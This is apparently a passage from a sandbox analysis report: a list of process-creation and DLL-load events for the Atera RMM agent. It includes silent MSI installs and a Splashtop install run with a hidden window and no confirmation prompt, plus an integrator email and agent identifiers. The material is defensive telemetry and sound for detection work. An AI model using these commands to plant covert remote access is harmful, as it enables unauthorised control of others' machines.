                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "8786f2fa-f7ec-48f3-845c-8cd509c85e9f" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "1b6d15b4-846f-4811-aa62-e314f5d5945b" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command " ################################################################################################ # Windows 11 Compatibility Check Script # ################################################################################################ # Compatibility flag $IsCompatible = $true # Check if current OS is Windows 10 $OSVersion = (Get-CimInstance -Class Win32_OperatingSystem).Caption if (-not $OSVersion.Contains('Windows 10')) { return } # Architecture x64 $Arch = (Get-CimInstance -Class CIM_ComputerSystem).SystemType $ArchValue = 'x64-based PC' if ($Arch -ne $ArchValue) { $IsCompatible = $false } # Screen Resolution $ScreenInfo = (Get-CimInstance -ClassName Win32_VideoController).CurrentVerticalResolution $ValueMin = 720 if ($ScreenInfo -le $ValueMin) { $IsCompatible = $false } # CPU composition $Core = (Get-CimInstance -Class CIM_Processor | Select-Object *).NumberOfCores $CoreValue = 2 $Frequency = (Get-CimInstance -Class CIM_Processor | Select-Object *).MaxClockSpeed $FrequencyValue = 1000 if (-not (($Core -ge $CoreValue) -and ($Frequency -ge $FrequencyValue))) { $IsCompatible = $false } # TPM $TPM2 = $false if ((Get-Tpm).ManufacturerVersionFull20) { $TPM2 = -not (Get-Tpm).ManufacturerVersionFull20.Contains('not supported') } if ($TPM2 -contains $false) { $IsCompatible = $false } # Secure Boot $SecureBoot = Confirm-SecureBootUEFI if ($SecureBoot -ne $true) { $IsCompatible = $false } # RAM available $Memory = (Get-CimInstance -Class CIM_ComputerSystem).TotalPhysicalMemory $SetMinMemory = 4294967296 if ($Memory -lt $SetMinMemory) { $IsCompatible = $false } # Storage available $ListDisk = Get-CimInstance -Class Win32_LogicalDisk | Where-Object { $_.DriveType -eq '3' } $SetMinSizeLimit = 64GB 
$DiskCompatible = $false foreach ($Disk in $ListDisk) { if ($Disk.FreeSpace -ge $SetMinSizeLimit) { $DiskCompatible = $true } } if (-not $DiskCompatible) { $IsCompatible = $false } # Output final result $IsCompatible "
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" 52187e48-563c-468d-9785-3542f81fb412 "1aa92b0c-e5fb-4470-8edf-86a7f92c710d" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIiwiUmVxdWVzdFBlcm1pc3Npb25PcHRpb24iOm51bGwsIlJlcXVpcmVQYXNzd29yZE9wdGlvbiI6bnVsbCwiUGFzc3dvcmQiOm51bGx9" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" 52187e48-563c-468d-9785-3542f81fb412 "69e8737b-1308-4d43-800a-39f09304f118" agent-api.atera.com/Production 443 or8ixLi90Mf "syncprofile" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: unknownProcess created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k smphost
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" 52187e48-563c-468d-9785-3542f81fb412 "e82d88f8-5758-4c6f-9f7b-8b023b21ca56" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" 52187e48-563c-468d-9785-3542f81fb412 "c4c25269-0a4b-4daf-adc0-e2db93d9b9dd" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" schedulerrun
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe" 52187e48-563c-468d-9785-3542f81fb412 "440dfd42-8399-4319-8ab9-c9695127bb3a" agent-api.atera.com/Production 443 or8ixLi90Mf "pollAll" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe" 52187e48-563c-468d-9785-3542f81fb412 "625a9ffc-3a6c-4d9d-b846-9cb0081c4ad4" agent-api.atera.com/Production 443 or8ixLi90Mf "syncinstalledapps" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeProcess created: C:\Windows\System32\msiexec.exe "msiexec.exe" /i C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi /lv* AteraSetupLog.txt /qn /norestart
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 512046948B0983DC32EDE392DA99D036 E Global\MSI0000
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI5085.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6967703 37 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI5885.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6969500 41 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeProcess created: C:\Windows\Temp\SplashtopStreamer.exe "C:\Windows\TEMP\SplashtopStreamer.exe" prevercheck /s /i sec_opt=0,confirm_d=0,hidewindow=1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe" 52187e48-563c-468d-9785-3542f81fb412 "c714c0bb-2ce8-418e-929f-2ec4a445cfb0" agent-api.atera.com/Production 443 or8ixLi90Mf "probe" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" 52187e48-563c-468d-9785-3542f81fb412 "f6b70a2c-1bfd-4903-a0e1-81c5afac28c1" agent-api.atera.com/Production 443 or8ixLi90Mf "monitor" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding BF843BCBC9EBED5C34216282DB92822D
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3A3D5EBA34EB9624AE48E4F4D08FECDB E Global\MSI0000
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="contato@fazendadoscordeiros.com.br" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000P2oAPIAZ" /AgentId="52187e48-563c-468d-9785-3542f81fb412"
                                Source: C:\Windows\System32\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI2D79.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6893046 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI2FBD.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6893546 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI3FBB.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6897625 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI56F2.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6903546 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exe
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 STOP AteraAgent
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "cb3e2cb9-55c1-438a-8389-94c341441cc1" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "b007e062-743d-47e1-a870-a586f83a0d8d" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "8786f2fa-f7ec-48f3-845c-8cd509c85e9f" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "1b6d15b4-846f-4811-aa62-e314f5d5945b" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" 52187e48-563c-468d-9785-3542f81fb412 "1aa92b0c-e5fb-4470-8edf-86a7f92c710d" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIiwiUmVxdWVzdFBlcm1pc3Npb25PcHRpb24iOm51bGwsIlJlcXVpcmVQYXNzd29yZE9wdGlvbiI6bnVsbCwiUGFzc3dvcmQiOm51bGx9" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" 52187e48-563c-468d-9785-3542f81fb412 "e82d88f8-5758-4c6f-9f7b-8b023b21ca56" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" 52187e48-563c-468d-9785-3542f81fb412 "c4c25269-0a4b-4daf-adc0-e2db93d9b9dd" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe" 52187e48-563c-468d-9785-3542f81fb412 "440dfd42-8399-4319-8ab9-c9695127bb3a" agent-api.atera.com/Production 443 or8ixLi90Mf "pollAll" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command " ################################################################################################ # Windows 11 Compatibility Check Script # ################################################################################################ # Compatibility flag $IsCompatible = $true # Check if current OS is Windows 10 $OSVersion = (Get-CimInstance -Class Win32_OperatingSystem).Caption if (-not $OSVersion.Contains('Windows 10')) { return } # Architecture x64 $Arch = (Get-CimInstance -Class CIM_ComputerSystem).SystemType $ArchValue = 'x64-based PC' if ($Arch -ne $ArchValue) { $IsCompatible = $false } # Screen Resolution $ScreenInfo = (Get-CimInstance -ClassName Win32_VideoController).CurrentVerticalResolution $ValueMin = 720 if ($ScreenInfo -le $ValueMin) { $IsCompatible = $false } # CPU composition $Core = (Get-CimInstance -Class CIM_Processor | Select-Object *).NumberOfCores $CoreValue = 2 $Frequency = (Get-CimInstance -Class CIM_Processor | Select-Object *).MaxClockSpeed $FrequencyValue = 1000 if (-not (($Core -ge $CoreValue) -and ($Frequency -ge $FrequencyValue))) { $IsCompatible = $false } # TPM $TPM2 = $false if ((Get-Tpm).ManufacturerVersionFull20) { $TPM2 = -not (Get-Tpm).ManufacturerVersionFull20.Contains('not supported') } if ($TPM2 -contains $false) { $IsCompatible = $false } # Secure Boot $SecureBoot = Confirm-SecureBootUEFI if ($SecureBoot -ne $true) { $IsCompatible = $false } # RAM available $Memory = (Get-CimInstance -Class CIM_ComputerSystem).TotalPhysicalMemory $SetMinMemory = 4294967296 if ($Memory -lt $SetMinMemory) { $IsCompatible = $false } # Storage available $ListDisk = Get-CimInstance -Class Win32_LogicalDisk | Where-Object { $_.DriveType -eq '3' } $SetMinSizeLimit = 64GB 
$DiskCompatible = $false foreach ($Disk in $ListDisk) { if ($Disk.FreeSpace -ge $SetMinSizeLimit) { $DiskCompatible = $true } } if (-not $DiskCompatible) { $IsCompatible = $false } # Output final result $IsCompatible "
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\Temp\SplashtopStreamer.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptnet.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: webio.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: propsys.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: edputil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: urlmon.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iertutil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wintypes.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: appresolver.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: bcp47langs.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: slc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sppc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winnsi.dll
